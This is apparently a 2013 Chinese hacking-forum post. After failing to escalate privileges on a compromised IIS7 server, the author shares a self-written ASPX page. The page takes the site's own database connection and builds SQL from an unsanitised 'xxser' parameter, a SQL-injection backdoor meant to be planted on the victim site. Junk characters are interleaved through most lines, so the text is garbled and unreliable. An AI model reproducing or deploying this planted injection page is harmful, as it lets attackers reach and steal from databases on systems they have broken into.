昨天跟4z1看一个站点,提权很难提,看了整整5个小时,无果。 2008+iis7,无sa,无root,无各种服务。。。
' a. Q! i4 k) W% P9 ^; H其实中用到了aspx构造注射来跨站,网上找了一堆代码,没一个能用的。, @1 r/ ?. }! I2 a) k/ \
代码量不多,自己写个拉倒了。烦死了。) V" s4 V. `; m' o0 [6 g* N g
) {# Z0 M) O4 Z; O4 K
9 Z8 O2 K* B S' C<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">3 W8 b6 @ e2 x. h
<html xmlns="http://www.w3.org/1999/xhtml">
9 @, k: t* D( P- }& [<head runat="server">/ L) S- x# H+ _; U
<title>暗影aspx构造注射专用页面</title>/ P8 C; |, @9 {& L$ T3 D" R5 |
</head>8 I- |1 F s' \. u0 r
<body>5 }9 |+ n5 v& M+ \7 ^9 u- i p
<form id="form1" runat="server"># z. a t3 m. q* p, Q/ z3 K' ] L+ v
<div>
* d% P2 |( n; f" Y: i; F <script language="c#" runat="server">8 W M; v$ q4 R
- G: A1 z, x- m" F* F4 Z# S void page_init(object sender, EventArgs e)( Q' E' ]2 A2 q: G/ l- r. M( H1 r
{
. r0 `! a& q; }: m0 N/ Z
9 W- }# P5 k. P2 Q System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection();3 N) O4 D- f6 F
! l1 z% `; ]- c5 h7 b0 J6 h9 z conn.ConnectionString = ConfigurationManager.ConnectionStrings["连接名"].ToString();( p4 F+ D2 f* _4 _
conn.Open();
0 H2 H) C I! g5 I8 B+ C
. a/ Z7 u5 p# l. Q/ n4 ] string i = this.Page.Request.Params["xxser"]; //这里是参数?xxser=1
O8 S/ b- {# c* g: q
& x. K0 k5 [7 L3 E. y" g* d System.Data.SqlClient.SqlCommand command = new System.Data.SqlClient.SqlCommand("select * from [表] where 列名= " + i, conn);
2 |+ X) w) H8 V7 P9 @: ?) u: J6 u int x = command.ExecuteNonQuery();
- x, G* _4 E k' _% g2 S! Q. `" ~ Response.Write(i+"\n");' k, e2 P/ }8 f2 ]2 M
Response.Write(x);5 _# ]6 O: g% n0 c5 G& B
conn.Close();8 L+ o" i$ k) ]( N" ~; |( `
}
) A9 y3 O: M: `3 l8 }
" F/ `- |0 Q) V4 C7 \ </script>
. c; _) Q( T0 M, }3 o+ q </div>( T# H, V2 R% l. w) r
</form>
' h2 c. \1 h+ s6 B</body>
* O. h' p' O2 G- I! s- b- S</html>
5 u. K! V$ Y; z' d" F1 @, f* C4 d |
发表于 2013-3-20 21:32:01
收藏
支持
反对